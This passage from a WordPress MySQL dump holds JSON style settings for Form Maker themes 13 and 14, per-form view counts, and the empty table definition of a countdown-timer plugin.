3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"#ffffff\",\"MCCPBackground\":\"\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"8\",\"MCCPHeight\":\"8\",\"MCCPMargin\":\"2\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"left\",\"SPBGColor\":\"#1e6466\",\"SPWidth\":\"130\",\"SPHeight\":\"28\",\"SPFontSize\":\"14\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"0px 5px\",\"SPMargin\":\"0 10px 0 0\",\"SPBorderTop\":\"top\",\"SPBorderRight\":\"right\",\"SPBorderBottom\":\"bottom\",\"SPBorderLeft\":\"left\",\"SPBorderColor\":\"#1e6466\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"\",\"SHPBGColor\":\"#268285\",\"SHPColor\":\"#ffffff\",\"SHPBorderTop\":\"top\",\"SHPBorderRight\":\"right\",\"SHPBorderBottom\":\"bottom\",\"SHPBorderLeft\":\"left\",\"SHPBorderColor\":\"#268285\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#d4d4d4\",\"BPWidth\":\"60\",\"BPHeight\":\"28\",\"BPFontSize\":\"15\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#11393a\",\"BPPadding\":\"0px 5px\",\"BPMargin\":\"0 15px 0 0\",\"BPBorderTop\":\"top\",\"BPBorderRight\":\"right\",\"BPBorderBottom\":\"bottom\",\"BPBorderLeft\":\"left\",\"BPBorderColor\":\"#d4d4d4\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"\",\"BHPBGColor\":\"#f2ecde\",\"BHPColor\":\"#37352f\",\"BHPBorderTop\":\"top\",\"BHPBorderRight\":\"right\",\"BHPBorderBottom\":\"bottom\",\"BHPBorderLeft\":\"left\",\"BHPBorderColor\":\"#f2ecde\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#268285\",\"PSAPFontSize\":\"14\",\"PSAPFontWeight\":\"bold\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"10px\",\"PSAPMargin\":\"0\",\"PSAPBorderColor\":\"\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"4\",\"PSAPBorderRadius\":\"0\",\"PSDPBGColor\":\"#d4d4d4\",\"PSDPFontSize\":\"14\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#100e0e\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"8px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderColor\":\"#a3a3a3\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"2\",\"PSDPBorderRadius\":\"\",\"PSAPAlign\":\"center\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#132d39\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#132d39\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#132d39\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#132d39\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"6px\",\"CBPRight\":\"6px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"18\",\"CBPFontWeight\":\"normal\",\"CBPColor\":\"#1e6466\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#ffffff\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#204a5c\",\"CBHPBorderColor\":\"#737373\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#204a5c\",\"MBPFontSize\":\"15\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#ffffff\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#204a5c\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#5d98b1\",\"MBHPColor\":\"#ffffff\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#5d98b1\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#ffffff\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#ff1313\",\"OPDPIcon\":\"images/themes/date-pickers/5.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2),(13,'Theme 13','{\"GPFontFamily\":\"tahoma\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"20\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#43aeab\",\"HPWidth\":\"100\",\"HTPWidth\":\"40\",\"HPPadding\":\"20px 0\",\"HPMargin\":\"0\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#b7b7b7\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"20\",\"HTPWeight\":\"normal\",\"HTPColor\":\"#ffffff\",\"HDPFontSize\":\"13\",\"HDPColor\":\"#ffffff\",\"HIPAlign\":\"top\",\"HIPWidth\":\"80\",\"HIPHeight\":\"\",\"GPBGColor\":\"#ffffff\",\"GPFontSize\":\"15\",\"GPFontWeight\":\"normal\",\"GPWidth\":\"100\",\"GTPWidth\":\"60\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#676767\",\"GPPadding\":\"10px 0\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#9c9c9c\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#ffffff\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"15px 20px\",\"COPMargin\":\"0px\",\"FPWidth\":\"70\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"28\",\"IPFontSize\":\"14\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#e4e4e4\",\"IPColor\":\"#9a9a9a\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#e4e4e4\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/2.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"#ffffff\",\"SCPWidth\":\"16\",\"SCPHeight\":\"16\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#868686\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#868686\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"5\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"#ffffff\",\"MCPWidth\":\"16\",\"MCPHeight\":\"16\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#868686\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"\",\"MCCPBackground\":\"images/themes/checkboxes/1.png\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"16\",\"MCCPHeight\":\"16\",\"MCCPMargin\":\"0\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"left\",\"SPBGColor\":\"#f38989\",\"SPWidth\":\"\",\"SPHeight\":\"\",\"SPFontSize\":\"16\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"5px 8px\",\"SPMargin\":\"0\",\"SPBorderTop\":\"top\",\"SPBorderRight\":\"right\",\"SPBorderBottom\":\"bottom\",\"SPBorderLeft\":\"left\",\"SPBorderColor\":\"#f38989\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"\",\"SHPBGColor\":\"#c17777\",\"SHPColor\":\"#ffffff\",\"SHPBorderTop\":\"top\",\"SHPBorderRight\":\"right\",\"SHPBorderBottom\":\"bottom\",\"SHPBorderLeft\":\"left\",\"SHPBorderColor\":\"#c17777\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#ffffff\",\"BPWidth\":\"\",\"BPHeight\":\"\",\"BPFontSize\":\"16\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#8c8c8c\",\"BPPadding\":\"5px 8px\",\"BPMargin\":\"0 15px 0 0\",\"BPBorderTop\":\"top\",\"BPBorderRight\":\"right\",\"BPBorderBottom\":\"bottom\",\"BPBorderLeft\":\"left\",\"BPBorderColor\":\"#43aeab\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"\",\"BHPBGColor\":\"#43aeab\",\"BHPColor\":\"#ffffff\",\"BHPBorderTop\":\"top\",\"BHPBorderRight\":\"right\",\"BHPBorderBottom\":\"bottom\",\"BHPBorderLeft\":\"left\",\"BHPBorderColor\":\"#787878\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#f38989\",\"PSAPFontSize\":\"16\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"6px\",\"PSAPMargin\":\"0 0 4px 0 \",\"PSAPBorderTop\":\"top\",\"PSAPBorderRight\":\"right\",\"PSAPBorderBottom\":\"bottom\",\"PSAPBorderLeft\":\"left\",\"PSAPBorderColor\":\"#f38989\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"0\",\"PSDPBGColor\":\"#a5a5a5\",\"PSDPFontSize\":\"16\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#ffffff\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"2px 4px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderTop\":\"top\",\"PSDPBorderRight\":\"right\",\"PSDPBorderBottom\":\"bottom\",\"PSDPBorderLeft\":\"left\",\"PSDPBorderColor\":\"#a3a3a3\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"2\",\"PSDPBorderRadius\":\"0\",\"PSAPAlign\":\"right\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#43aeab\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#777777\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#43aeab\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#777777\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"10px\",\"CBPRight\":\"10px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"18\",\"CBPFontWeight\":\"normal\",\"CBPColor\":\"#ffffff\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#ffffff\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#f38989\",\"CBHPBorderColor\":\"#737373\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#b7b7b7\",\"MBPFontSize\":\"17\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#ffffff\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#8f8f8f\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#ffffff\",\"MBHPColor\":\"#8f8f8f\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#8f8f8f\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#aeaeae\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#cf1515\",\"OPDPIcon\":\"images/themes/date-pickers/5.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\".mwd-header-text { padding: 15px 15px 0; }\"}',0,2),(14,'Theme 14','{\"GPFontFamily\":\"tahoma\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"40\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#386f74\",\"HPWidth\":\"100\",\"HTPWidth\":\"26\",\"HPPadding\":\"0 20px\",\"HPMargin\":\"\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#b7b7b7\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"19\",\"HTPWeight\":\"normal\",\"HTPColor\":\"#ffffff\",\"HDPFontSize\":\"13\",\"HDPColor\":\"#ffffff\",\"HIPAlign\":\"left\",\"HIPWidth\":\"40\",\"HIPHeight\":\"\",\"GPBGColor\":\"#5dbac2\",\"GPFontSize\":\"15\",\"GPFontWeight\":\"normal\",\"GPWidth\":\"100\",\"GTPWidth\":\"74\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#ffffff\",\"GPPadding\":\"0\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#ffffff\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#5dbac2\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"15px 20px\",\"COPMargin\":\"0px\",\"FPWidth\":\"70\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"28\",\"IPFontSize\":\"13\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#ffffff\",\"IPColor\":\"#868686\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#ffffff\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/2.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"#ffffff\",\"SCPWidth\":\"16\",\"SCPHeight\":\"16\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#868686\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#868686\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"5\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"#ffffff\",\"MCPWidth\":\"16\",\"MCPHeight\":\"16\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#868686\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"\",\"MCCPBackground\":\"images/themes/checkboxes/1.png\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"16\",\"MCCPHeight\":\"16\",\"MCCPMargin\":\"0\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"right\",\"SPBGColor\":\"#f6c37a\",\"SPWidth\":\"\",\"SPHeight\":\"\",\"SPFontSize\":\"14\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"5px 15px\",\"SPMargin\":\"0 15px 0 0\",\"SPBorderBottom\":\"bottom\",\"SPBorderColor\":\"#ffffff\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"3\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"\",\"SHPBGColor\":\"#f4b459\",\"SHPColor\":\"#ffffff\",\"SHPBorderBottom\":\"bottom\",\"SHPBorderColor\":\"#ffffff\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"3\",\"BPBGColor\":\"#5dbac2\",\"BPWidth\":\"\",\"BPHeight\":\"\",\"BPFontSize\":\"14\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#ffffff\",\"BPPadding\":\"5px 8px\",\"BPMargin\":\"0 15px 0 0\",\"BPBorderColor\":\"#ffffff\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"3\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"\",\"BHPBGColor\":\"#5dbac2\",\"BHPColor\":\"#ffffff\",\"BHPBorderColor\":\"#ffffff\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#e74c3c\",\"PSAPFontSize\":\"16\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"8px\",\"PSAPMargin\":\"0 0 4px 0 \",\"PSAPBorderTop\":\"top\",\"PSAPBorderRight\":\"right\",\"PSAPBorderBottom\":\"bottom\",\"PSAPBorderLeft\":\"left\",\"PSAPBorderColor\":\"#e74c3c\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"3\",\"PSDPBGColor\":\"#a5a5a5\",\"PSDPFontSize\":\"16\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#ffffff\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"4px 6px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderTop\":\"top\",\"PSDPBorderRight\":\"right\",\"PSDPBorderBottom\":\"bottom\",\"PSDPBorderLeft\":\"left\",\"PSDPBorderColor\":\"#a3a3a3\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"2\",\"PSDPBorderRadius\":\"3\",\"PSAPAlign\":\"right\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#e74c3c\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#2d4d5f\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#9c9c9c\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#2d4d5f\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"22px\",\"CBPRight\":\"10px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"20\",\"CBPFontWeight\":\"normal\",\"CBPColor\":\"#ffffff\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#f6c37a\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#f6c37a\",\"CBHPBorderColor\":\"#737373\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#386f74\",\"MBPFontSize\":\"15\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#ffffff\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#386f74\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#5dbac2\",\"MBHPColor\":\"#ffffff\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#5dbac2\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#afafaf\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#386f74\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2);
/*!40000 ALTER TABLE `wpxb_formmaker_themes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_formmaker_views`
--

DROP TABLE IF EXISTS `wpxb_formmaker_views`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_formmaker_views` (
  `form_id` int(11) NOT NULL,
  `views` int(50) NOT NULL,
  PRIMARY KEY (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_formmaker_views`
--

LOCK TABLES `wpxb_formmaker_views` WRITE;
/*!40000 ALTER TABLE `wpxb_formmaker_views` DISABLE KEYS */;
INSERT INTO `wpxb_formmaker_views` VALUES (1,3),(2,109),(5,1),(11,3),(12,2),(14,43),(16,26),(17,0),(18,3),(19,3);
/*!40000 ALTER TABLE `wpxb_formmaker_views` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_hurrytimer_evergreen`
--

DROP TABLE IF EXISTS `wpxb_hurrytimer_evergreen`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_hurrytimer_evergreen` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `countdown_id` bigint(20) unsigned NOT NULL,
  `client_ip_address` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `expired` tinyint(1) unsigned DEFAULT NULL,
  `client_expires_at` bigint(20) unsigned NOT NULL,
  `destroy_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=30 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_hurrytimer_evergreen`
--

LOCK TABLES `wpxb_hurrytimer_evergreen` WRITE;
/*!40000 ALTER TABLE `wpxb_hurrytimer_evergreen` DISABLE KEYS */;
